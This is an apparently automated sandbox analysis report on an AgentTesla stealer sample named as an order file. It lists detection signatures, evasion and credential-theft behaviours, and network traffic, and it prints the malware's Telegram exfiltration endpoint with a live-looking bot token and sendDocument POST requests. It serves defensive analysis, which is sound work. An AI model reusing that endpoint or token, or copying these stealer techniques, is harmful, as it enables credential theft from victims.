Windows Analysis Report
ORDER (6256 OS)#391 PI.exe

Overview

General Information

Sample Name: ORDER (6256 OS)#391 PI.exe
Analysis ID: 764027
MD5: 19081ef2a08f678a3203b29124043c41
SHA1: e86acea06a600f170402a0c1020c25ac2550ffa0
SHA256: 2f356283c209400c6385a24450f266b59477e035e9389c8d1af4843cd1ad2374
Tags: agentteslaexe
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: ORDER (6256 OS)#391 PI.exe ReversingLabs: Detection: 30%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe ReversingLabs: Detection: 30%
Machine Learning detection for sample
Source: ORDER (6256 OS)#391 PI.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Joe Sandbox ML: detected
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage?chat_id=1644584536"}
Source: WsdnBq.exe.1328.8.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage"}
Uses 32bit PE files
Source: ORDER (6256 OS)#391 PI.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.4:49695 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
Source: ORDER (6256 OS)#391 PI.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RycGBA2.pdb source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Source: Binary string: RycGBA2.pdbSHA256 source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_0F2E0D18
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_0F2E0D08
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_0F2E0DD3
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 5_2_0E820B98
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 5_2_0E820B88

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49696 -> 149.154.167.220:443
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49698 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
May check the online IP address of the machine
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d3fba18902Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d46448f6a9Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 54.91.59.199 54.91.59.199
Source: Joe Sandbox View IP Address: 54.91.59.199 54.91.59.199
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: WsdnBq.exe, 00000008.00000003.450250389.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000003.535612424.00000000015F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301689714.0000000005F13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307345140.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304196469.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304651333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304139159.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305855891.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306476107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304491242.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303482107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305929932.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304437139.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307312499.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304413252.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306400487.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303216869.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303104333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306139248.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304750887.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304466931.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305354155.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303996945.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303155186.0000000005F13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comigXje
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304887480.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com9
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comFQO
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comK
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comR.TTF
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comT.TTF
